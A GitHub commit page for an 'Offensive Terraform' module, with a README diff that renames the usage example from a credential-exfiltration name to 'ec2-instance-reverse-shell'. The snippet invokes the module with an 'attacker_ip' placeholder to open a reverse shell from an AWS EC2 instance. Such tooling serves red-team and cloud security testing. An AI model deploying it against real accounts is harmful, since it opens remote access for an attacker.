Skip to content

Commit

Permalink
Fix usage module name
Browse files Browse the repository at this point in the history
  • Loading branch information
iganbold committed Sep 6, 2020
1 parent 1a8cb20 commit efbfd66
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -10,12 +10,12 @@ Offensive Terraform module which creates EC2 instance and reverse shell from an

## Usage
```
module "ec2_instance_credential_exfiltration" {
module "ec2-instance-reverse-shell" {
source = "offensive-terraform/ec2-instance-reverse-shell/aws"
subnet_id = "subnet-0a4a1cc04"
attacker_ip = "0.0.0.0"
}
```
## Author
Module managed by https://github.com/iganbold
Module managed by https://github.com/iganbold

0 comments on commit efbfd66

Please # to comment.